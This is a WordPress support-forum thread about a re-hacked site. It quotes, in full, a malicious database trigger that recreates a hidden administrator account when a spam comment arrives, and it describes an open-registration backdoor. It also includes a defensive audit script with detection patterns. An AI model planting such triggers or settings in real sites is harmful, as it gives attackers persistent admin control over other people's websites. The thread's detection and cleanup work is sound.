Support » Plugin: Wordfence Security - Firewall & Malware Scan » Re-Hacked via DB-Trigger

  • Resolved Chris

    (@bundfegadmin)


    Hi there,
    I just helped a friend with a hacked website. It was round 2, because we had removed the false-admin-account (wp-admin | wp-security@hotmail.com – seems to be a known hacker-account) and deleted/repaired all hacked files.
    When the account appeared again I looked deeper into everything.

    I found a trigger (name: after_insert_comment) in the database with the following code:

    BEGIN
         IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
             SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users);
             SET @nextWpUsersID = @lastInsertWpUsersId + 1;
             INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', 'wp-security@hotmail.com', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
             INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
             INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
         END IF;
     END
    

    I found the same trigger in three databases in the same webspace and wonder in how many pages this trigger is waiting.
    Is there any way that wordfence could be able to find db-triggers and show them in the scan?

    PS: the pw-hash was the same in all triggers so bruteforcing it could be pretty interesting since you could get access to a lot of sites (I changed it just a bit ;-))

  • Thread Starter Chris

    (@bundfegadmin)

    PPS: Another backdoor I stumbled upon a few years ago, and wordfence could potentially warn about: In wordpress-settings “Membership – Anyone can register” was checked and “New User Default Role” was “Administrator”. I even think wordpress should prevent this setting in its core…
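The two persistence mechanisms described in this thread (a database trigger that recreates an admin account, and open registration with an administrator default role) can both be audited from the database alone. The script below is an added example written for this page; it is not Wordfence code and not something the poster ran. The two SQL statements use the standard MySQL/MariaDB `information_schema.TRIGGERS` view and the real WordPress `wp_options` keys `users_can_register` and `default_role`; the function names (`audit_triggers`, `check_registration_settings`), the red-flag patterns and the sample rows are assumptions constructed here. The first sample row is the trigger body quoted in the opening post; the second is a hypothetical benign trigger that shows how a trigger with no red flags is still reported, because a stock WordPress install defines no triggers at all.

```python
"""Audit a WordPress database for trigger-based persistence and risky registration
settings. Added example for this thread; not Wordfence code."""
import re
from dataclasses import dataclass, field

# Run against the site's database. information_schema.TRIGGERS is standard MySQL;
# WordPress core creates no triggers, so every returned row deserves a look.
TRIGGER_QUERY = """
SELECT TRIGGER_NAME, EVENT_MANIPULATION, EVENT_OBJECT_TABLE, ACTION_STATEMENT, DEFINER
FROM information_schema.TRIGGERS
WHERE TRIGGER_SCHEMA = DATABASE()
"""

# Registration settings live in wp_options (adjust the prefix if the site uses another).
OPTIONS_QUERY = """
SELECT option_name, option_value FROM wp_options
WHERE option_name IN ('users_can_register', 'default_role')
"""

# Red flags inside a trigger body. [\w.`]* absorbs an optional schema qualifier,
# backticks and table prefix, so a custom prefix such as abc_users still matches.
RED_FLAGS = {
    "writes the users table": re.compile(r"insert\s+into\s+[\w.`]*users\b", re.I),
    "writes the usermeta table": re.compile(r"insert\s+into\s+[\w.`]*usermeta\b", re.I),
    "grants administrator capability": re.compile(r"administrator", re.I),
    "sets user_level 10": re.compile(r"user_level'\s*,\s*'10'", re.I),
    "fires on a magic comment string": re.compile(r"NEW\.comment_content\s+LIKE", re.I),
}
NO_FLAG = "no WordPress core trigger should exist; review manually"


@dataclass
class Finding:
    trigger: str
    event: str
    table: str
    reasons: list = field(default_factory=list)


def audit_triggers(rows):
    """rows: (name, event, table, body, definer) tuples as returned by TRIGGER_QUERY.
    Every trigger is reported; reasons lists the red flags that matched its body."""
    findings = []
    for name, event, table, body, _definer in rows:
        reasons = [label for label, pat in RED_FLAGS.items() if pat.search(body)]
        findings.append(Finding(name, event, table, reasons or [NO_FLAG]))
    return findings


def check_registration_settings(options):
    """options: {option_name: option_value} from OPTIONS_QUERY. Returns a list of problems."""
    problems = []
    open_registration = options.get("users_can_register") == "1"
    role = options.get("default_role", "subscriber")
    if open_registration and role != "subscriber":
        problems.append(f"users_can_register=1 with default_role={role}: "
                        "anyone who signs up receives that role")
    if role == "administrator" and not open_registration:
        problems.append("default_role=administrator: harmless only while registration stays "
                        "closed; flipping a single option opens the site")
    return problems


# Constructed sample rows: the first is the trigger body quoted in the thread, the second
# a hypothetical benign audit-log trigger (assumed, not from the page).
SAMPLE_TRIGGERS = [
    ("after_insert_comment", "INSERT", "wp_comments", r"""BEGIN
  IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
    SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users);
    SET @nextWpUsersID = @lastInsertWpUsersId + 1;
    INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', 'wp-security@hotmail.com', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
    INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
    INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
  END IF;
END""", "root@localhost"),
    ("log_post_update", "UPDATE", "wp_posts",
     "BEGIN INSERT INTO audit_log (post_id, changed_at) VALUES (NEW.ID, NOW()); END",
     "wpuser@localhost"),
]

if __name__ == "__main__":
    for f in audit_triggers(SAMPLE_TRIGGERS):
        print(f"trigger {f.trigger} ({f.event} on {f.table}): " + "; ".join(f.reasons))
    for p in check_registration_settings({"users_can_register": "1",
                                          "default_role": "administrator"}):
        print("settings:", p)
```

In practice the rows come from running `TRIGGER_QUERY` and `OPTIONS_QUERY` through the site's database credentials (the `mysql` client or `wp db query` with WP-CLI) and feeding the results to the two functions. One caveat: `information_schema.TRIGGERS` only lists triggers on tables for which the connecting account holds the TRIGGER privilege, so a restricted application user may see nothing even when a trigger exists; when in doubt, repeat the query as a privileged database user. Since the same trigger was found in three databases on one host, the check belongs in a loop over every schema the account can reach, not just the one site that showed symptoms.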

    Hey @bundfegadmin,

    Regarding your concern (second comment), you’re absolutely right.

    Your concern has already been presented to the WordPress Core Trac Team and is still active. For details, see WordPress Core Ticket No. 43936.

    Hope this helps.

    Cheerio!

    Plugin Support wfpeter

    (@wfpeter)

    Hi @bundfegadmin, thanks for the detailed information about what you’d had to fix in this case.

    I have mentioned this to our team and I believe a check for this specific malware is being discussed although I can’t provide ongoing updates here on the forums.

    I’ll just provide our site-cleaning documents below for reference just in case any checks have been missed or may help in future: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Make sure WordPress core and all of your plugins and themes are updated. Also, as the database triggers were affected in this case, update your passwords for the hosting control panel, FTP, WordPress admin users, and database.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.

    Thanks,

    Peter.

    Thread Starter Chris

    (@bundfegadmin)

    Hi folks,

    @generosus thanks for the post in the mentioned ticket. Are these times normal? That started 5 years ago. I am really not familiar with this community 😉

    @wfpeter thanks for considering it. Good luck to your team. And thanks for the fine Learning Center. I will look into it 🙂

    Chris
